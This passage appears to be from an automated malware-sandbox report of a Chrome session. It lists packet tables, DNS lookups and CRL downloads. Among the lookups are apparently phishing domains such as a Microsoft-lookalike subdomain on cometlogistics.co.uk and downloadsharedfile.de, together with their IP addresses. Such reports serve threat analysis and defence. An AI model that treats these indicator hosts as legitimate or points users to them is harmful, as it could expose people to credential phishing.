                        Apr 10, 2025 19:22:28.414690018 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.414784908 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.415045023 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.415056944 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.800513983 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.800642967 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.801749945 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.801759958 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.801963091 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.802290916 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.815815926 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.815932035 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.816433907 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.816445112 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.817202091 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.848273993 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.872154951 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.291976929 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.292059898 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.292119980 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.302190065 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.302206993 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.403884888 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.403914928 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.403974056 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.404164076 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.404181957 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.803225994 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.803298950 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.804651976 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.804657936 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.804863930 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.805203915 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.848270893 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:30.322032928 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:30.322124004 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:30.322463036 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:30.322479963 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:30.322496891 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:30.322521925 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:30.489939928 CEST49737443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:30.489979029 CEST44349737104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:30.490410089 CEST49738443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:30.490448952 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:30.490498066 CEST49738443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:30.490586042 CEST49737443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:30.490586042 CEST49737443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:30.490617990 CEST44349737104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:30.490832090 CEST49738443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:30.490843058 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.357705116 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.359108925 CEST49738443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:31.359108925 CEST49738443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:31.359122992 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.359483957 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.360270023 CEST49738443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:31.404268980 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.694961071 CEST44349737104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.695100069 CEST49737443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:31.714972973 CEST49737443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:31.715001106 CEST44349737104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.715251923 CEST44349737104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.731654882 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.731728077 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:31.731796026 CEST49738443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:31.762289047 CEST49737443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:31.865639925 CEST49738443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:31.865664005 CEST44349738104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:35.549158096 CEST44349730142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:35.549226999 CEST44349730142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:35.549473047 CEST49730443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:37.113677025 CEST49730443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:37.113698959 CEST44349730142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:39.480782032 CEST49739443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:39.480818987 CEST44349739104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:39.480897903 CEST49739443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:39.481146097 CEST49739443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:39.481163979 CEST44349739104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:39.680763006 CEST44349739104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:39.681641102 CEST49739443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:39.681669950 CEST44349739104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:46.677375078 CEST44349737104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:46.677447081 CEST44349737104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:46.679694891 CEST49737443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:47.113302946 CEST49737443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:47.113346100 CEST44349737104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:54.973059893 CEST44349739104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:54.973251104 CEST44349739104.21.7.120192.168.2.6
                        Apr 10, 2025 19:22:54.973324060 CEST49739443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:55.113902092 CEST49739443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:22:55.113930941 CEST44349739104.21.7.120192.168.2.6
                        Apr 10, 2025 19:23:13.829718113 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:23:13.829792023 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:23:25.333214045 CEST49745443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:23:25.333256006 CEST44349745142.251.35.164192.168.2.6
                        Apr 10, 2025 19:23:25.333353996 CEST49745443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:23:25.333683968 CEST49745443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:23:25.333702087 CEST44349745142.251.35.164192.168.2.6
                        Apr 10, 2025 19:23:25.546536922 CEST44349745142.251.35.164192.168.2.6
                        Apr 10, 2025 19:23:25.546993017 CEST49745443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:23:25.547024012 CEST44349745142.251.35.164192.168.2.6
                        Apr 10, 2025 19:23:28.804100037 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:23:28.804200888 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:23:28.804241896 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:23:29.115861893 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:23:29.115895033 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:23:35.555931091 CEST44349745142.251.35.164192.168.2.6
                        Apr 10, 2025 19:23:35.556088924 CEST44349745142.251.35.164192.168.2.6
                        Apr 10, 2025 19:23:35.556226015 CEST49745443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:23:37.114655972 CEST49745443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:23:37.114687920 CEST44349745142.251.35.164192.168.2.6
                        TimestampSource PortDest PortSource IPDest IP
                        Apr 10, 2025 19:21:02.987689972 CEST53591651.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:03.012243986 CEST53509121.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:03.764589071 CEST53536471.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:03.938451052 CEST53609971.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:06.815496922 CEST5009453192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:06.815496922 CEST5185353192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:06.914720058 CEST53500941.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:06.914736986 CEST53518531.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:08.244709015 CEST6058153192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:08.245001078 CEST6190553192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:08.342288017 CEST53605811.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:08.342681885 CEST53619051.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:09.261411905 CEST5899653192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:09.261527061 CEST4980253192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:09.344814062 CEST53589961.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:09.344835997 CEST53498021.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:09.832942009 CEST5961453192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:09.833157063 CEST6107453192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:10.060364008 CEST53596141.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:10.069323063 CEST53610741.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:10.962246895 CEST5826453192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:10.962246895 CEST6152053192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:11.154659033 CEST53582641.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:11.234745026 CEST53615201.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:12.113848925 CEST5954653192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:12.114192963 CEST5509153192.168.2.61.1.1.1
                        Apr 10, 2025 19:21:12.269737959 CEST53595461.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:12.269756079 CEST53550911.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:20.922193050 CEST53529891.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:39.782685995 CEST53510901.1.1.1192.168.2.6
                        Apr 10, 2025 19:21:41.985265017 CEST5359920162.159.36.2192.168.2.6
                        Apr 10, 2025 19:22:02.204252005 CEST53638521.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:02.533032894 CEST53648571.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:04.745147943 CEST138138192.168.2.6192.168.2.255
                        Apr 10, 2025 19:22:20.929631948 CEST53634071.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:21.501790047 CEST53509531.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:25.270296097 CEST5585353192.168.2.61.1.1.1
                        Apr 10, 2025 19:22:25.270737886 CEST6096253192.168.2.61.1.1.1
                        Apr 10, 2025 19:22:25.364347935 CEST53558531.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:25.364378929 CEST53609621.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:28.320214987 CEST5217753192.168.2.61.1.1.1
                        Apr 10, 2025 19:22:28.324078083 CEST6397453192.168.2.61.1.1.1
                        Apr 10, 2025 19:22:28.408740997 CEST53521771.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:28.412537098 CEST53639741.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:29.305799961 CEST5338653192.168.2.61.1.1.1
                        Apr 10, 2025 19:22:29.306123972 CEST5323753192.168.2.61.1.1.1
                        Apr 10, 2025 19:22:29.401813030 CEST53533861.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:29.403323889 CEST53532371.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:30.397759914 CEST5400753192.168.2.61.1.1.1
                        Apr 10, 2025 19:22:30.397852898 CEST6296753192.168.2.61.1.1.1
                        Apr 10, 2025 19:22:30.489161968 CEST53540071.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:30.489183903 CEST53629671.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:38.490505934 CEST53583751.1.1.1192.168.2.6
                        Apr 10, 2025 19:22:57.384291887 CEST53553871.1.1.1192.168.2.6
                        Apr 10, 2025 19:23:20.335367918 CEST53535661.1.1.1192.168.2.6
                        Apr 10, 2025 19:23:20.604604006 CEST53654711.1.1.1192.168.2.6
                        TimestampSource IPDest IPChecksumCodeType
                        Apr 10, 2025 19:21:11.234814882 CEST192.168.2.61.1.1.1c256(Port unreachable)Destination Unreachable

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Apr 10, 2025 19:21:06.815496922 CEST192.168.2.61.1.1.10x3c82Standard query (0)www.google.comA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:06.815496922 CEST192.168.2.61.1.1.10x3522Standard query (0)www.google.com65IN (0x0001)false
                        Apr 10, 2025 19:21:08.244709015 CEST192.168.2.61.1.1.10x9b6fStandard query (0)ucarecdn.comA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:08.245001078 CEST192.168.2.61.1.1.10xf35cStandard query (0)ucarecdn.com65IN (0x0001)false
                        Apr 10, 2025 19:21:09.261411905 CEST192.168.2.61.1.1.10xcdb8Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:09.261527061 CEST192.168.2.61.1.1.10x57a6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                        Apr 10, 2025 19:21:09.832942009 CEST192.168.2.61.1.1.10xc2ebStandard query (0)33vh88.perthshiregardenrooms.co.ukA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:09.833157063 CEST192.168.2.61.1.1.10x2b98Standard query (0)33vh88.perthshiregardenrooms.co.uk65IN (0x0001)false
                        Apr 10, 2025 19:21:10.962246895 CEST192.168.2.61.1.1.10xe0fdStandard query (0)microsoftonelineda48b13627.cometlogistics.co.ukA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:10.962246895 CEST192.168.2.61.1.1.10x7055Standard query (0)microsoftonelineda48b13627.cometlogistics.co.uk65IN (0x0001)false
                        Apr 10, 2025 19:21:12.113848925 CEST192.168.2.61.1.1.10x96f7Standard query (0)downloadsharedfile.deA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:12.114192963 CEST192.168.2.61.1.1.10xe53cStandard query (0)downloadsharedfile.de65IN (0x0001)false
                        Apr 10, 2025 19:22:25.270296097 CEST192.168.2.61.1.1.10x1e9cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:25.270737886 CEST192.168.2.61.1.1.10xe5adStandard query (0)www.google.com65IN (0x0001)false
                        Apr 10, 2025 19:22:28.320214987 CEST192.168.2.61.1.1.10xf02Standard query (0)33vh88.perthshiregardenrooms.co.ukA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:28.324078083 CEST192.168.2.61.1.1.10x8bStandard query (0)33vh88.perthshiregardenrooms.co.uk65IN (0x0001)false
                        Apr 10, 2025 19:22:29.305799961 CEST192.168.2.61.1.1.10xc61cStandard query (0)microsoftonelineda48b13627.cometlogistics.co.ukA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:29.306123972 CEST192.168.2.61.1.1.10xb70Standard query (0)microsoftonelineda48b13627.cometlogistics.co.uk65IN (0x0001)false
                        Apr 10, 2025 19:22:30.397759914 CEST192.168.2.61.1.1.10xfef2Standard query (0)downloadsharedfile.deA (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:30.397852898 CEST192.168.2.61.1.1.10x267eStandard query (0)downloadsharedfile.de65IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Apr 10, 2025 19:21:06.914720058 CEST1.1.1.1192.168.2.60x3c82No error (0)www.google.com142.251.35.164A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:06.914736986 CEST1.1.1.1192.168.2.60x3522No error (0)www.google.com65IN (0x0001)false
                        Apr 10, 2025 19:21:08.342288017 CEST1.1.1.1192.168.2.60x9b6fNo error (0)ucarecdn.com151.101.130.132A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:08.342288017 CEST1.1.1.1192.168.2.60x9b6fNo error (0)ucarecdn.com151.101.66.132A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:08.342288017 CEST1.1.1.1192.168.2.60x9b6fNo error (0)ucarecdn.com151.101.194.132A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:08.342288017 CEST1.1.1.1192.168.2.60x9b6fNo error (0)ucarecdn.com151.101.2.132A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:09.344814062 CEST1.1.1.1192.168.2.60xcdb8No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:09.344814062 CEST1.1.1.1192.168.2.60xcdb8No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:09.344835997 CEST1.1.1.1192.168.2.60x57a6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                        Apr 10, 2025 19:21:10.060364008 CEST1.1.1.1192.168.2.60xc2ebNo error (0)33vh88.perthshiregardenrooms.co.uk167.172.166.226A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:11.154659033 CEST1.1.1.1192.168.2.60xe0fdNo error (0)microsoftonelineda48b13627.cometlogistics.co.uk167.172.166.226A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:12.269737959 CEST1.1.1.1192.168.2.60x96f7No error (0)downloadsharedfile.de104.21.7.120A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:12.269737959 CEST1.1.1.1192.168.2.60x96f7No error (0)downloadsharedfile.de172.67.130.75A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:21:12.269756079 CEST1.1.1.1192.168.2.60xe53cNo error (0)downloadsharedfile.de65IN (0x0001)false
                        Apr 10, 2025 19:22:25.364347935 CEST1.1.1.1192.168.2.60x1e9cNo error (0)www.google.com142.251.35.164A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:25.364378929 CEST1.1.1.1192.168.2.60xe5adNo error (0)www.google.com65IN (0x0001)false
                        Apr 10, 2025 19:22:28.408740997 CEST1.1.1.1192.168.2.60xf02No error (0)33vh88.perthshiregardenrooms.co.uk167.172.166.226A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:29.401813030 CEST1.1.1.1192.168.2.60xc61cNo error (0)microsoftonelineda48b13627.cometlogistics.co.uk167.172.166.226A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:30.489161968 CEST1.1.1.1192.168.2.60xfef2No error (0)downloadsharedfile.de104.21.7.120A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:30.489161968 CEST1.1.1.1192.168.2.60xfef2No error (0)downloadsharedfile.de172.67.130.75A (IP address)IN (0x0001)false
                        Apr 10, 2025 19:22:30.489183903 CEST1.1.1.1192.168.2.60x267eNo error (0)downloadsharedfile.de65IN (0x0001)false

                        HTTP Request Dependency Graph

                        • ucarecdn.com
                        • cdnjs.cloudflare.com
                        • 33vh88.perthshiregardenrooms.co.uk
                        • microsoftonelineda48b13627.cometlogistics.co.uk
                          • downloadsharedfile.de
                        • c.pki.goog

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination Port
                        0192.168.2.649711142.251.40.9980
                        TimestampBytes transferredDirectionData
                        Apr 10, 2025 19:21:17.370960951 CEST202OUTGET /r/gsr1.crl HTTP/1.1
                        Cache-Control: max-age = 3000
                        Connection: Keep-Alive
                        Accept: */*
                        If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                        User-Agent: Microsoft-CryptoAPI/10.0
                        Host: c.pki.goog
                        Apr 10, 2025 19:21:17.458359957 CEST1031INHTTP/1.1 200 OK
                        Accept-Ranges: bytes
                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                        Cross-Origin-Resource-Policy: cross-origin
                        Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                        Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                        Content-Length: 1739
                        X-Content-Type-Options: nosniff
                        Server: sffe
                        X-XSS-Protection: 0
                        Date: Thu, 10 Apr 2025 17:16:39 GMT
                        Expires: Thu, 10 Apr 2025 18:06:39 GMT
                        Cache-Control: public, max-age=3000
                        Age: 278
                        Last-Modified: Mon, 07 Apr 2025 13:58:00 GMT
                        Content-Type: application/pkix-crl
                        Vary: Accept-Encoding
                        Data Raw: 30 82 06 c7 30 82 05 af 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 57 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 67 6e 20 6e 76 2d 73 61 31 10 30 0e 06 03 55 04 0b 13 07 52 6f 6f 74 20 43 41 31 1b 30 19 06 03 55 04 03 13 12 47 6c 6f 62 61 6c 53 69 67 6e 20 52 6f 6f 74 20 43 41 17 0d 32 35 30 34 30 37 30 30 30 30 30 30 5a 17 0d 32 35 30 37 31 35 30 30 30 30 30 30 5a 30 82 04 f1 30 2a 02 0b 04 00 00 00 00 01 1e 44 a5 e4 04 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 29 45 c3 a8 0f 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 20 19 c1 8d 68 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 2c 5e 7f 1a 88 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55
                        Data Ascii: 000*H0W10UBE10UGlobalSign nv-sa10URoot CA10UGlobalSign Root CA250407000000Z250715000000Z00*D141125000000Z00U0*)E141125000000Z00U0* h141125000000Z00U0*,^141125000000Z00U
                        Apr 10, 2025 19:21:17.458378077 CEST1031INData Raw: 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 15 4b 5a c5 a7 17 0d 31 36 30 31 30 37 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 2f 4e e1 49 52 17 0d 31 37 30 34 31 39 30 30 30 30 30 30 5a 30
                        Data Ascii: 0*KZ160107000000Z00U0*/NIR170419000000Z00U0*/NG170419000000Z00U0*/N9191120000000Z00U0*/N=k191204000000Z00U0*/N;X
                        Apr 10, 2025 19:21:17.458390951 CEST390INData Raw: 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2d 02 0e 46 74 37 73 59 b7 a7 4a 8b d8 50 94 c5 cb 17 0d 32 32 30 37 30 37 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 a0 2f 30 2d 30 0a 06 03 55 1d 14 04 03 02 01 61 30
                        Data Ascii: 000Z00U0-Ft7sYJP220707000000Z00U/0-0Ua0U#0`{fEP/}4K0*HZS.y2F6_.r!Owk[NyhMP|tiCTx@
                        Apr 10, 2025 19:21:17.464219093 CEST200OUTGET /r/r4.crl HTTP/1.1
                        Cache-Control: max-age = 3000
                        Connection: Keep-Alive
                        Accept: */*
                        If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                        User-Agent: Microsoft-CryptoAPI/10.0
                        Host: c.pki.goog
                        Apr 10, 2025 19:21:17.549143076 CEST1031INHTTP/1.1 200 OK
                        Accept-Ranges: bytes
                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                        Cross-Origin-Resource-Policy: cross-origin
                        Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                        Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                        Content-Length: 530
                        X-Content-Type-Options: nosniff
                        Server: sffe
                        X-XSS-Protection: 0
                        Date: Thu, 10 Apr 2025 16:58:38 GMT
                        Expires: Thu, 10 Apr 2025 17:48:38 GMT
                        Cache-Control: public, max-age=3000
                        Age: 1359
                        Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
                        Content-Type: application/pkix-crl
                        Vary: Accept-Encoding
                        Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c
                        Data Ascii: 000*H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,
                        Apr 10, 2025 19:21:17.549158096 CEST212INData Raw: 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 a0 2f 30 2d 30 0a 06 03 55 1d 14 04 03 02 01 17 30 1f 06 03 55 1d 23 04 18 30 16 80 14 80 4c d6 eb 74 ff 49 36 a3
                        Data Ascii: XD250403080000Z00U/0-0U0U#0LtI6>j0*H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.649698151.101.130.1324434840C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:21:08 UTC740OUTGET /6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html HTTP/1.1
                        Host: ucarecdn.com
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
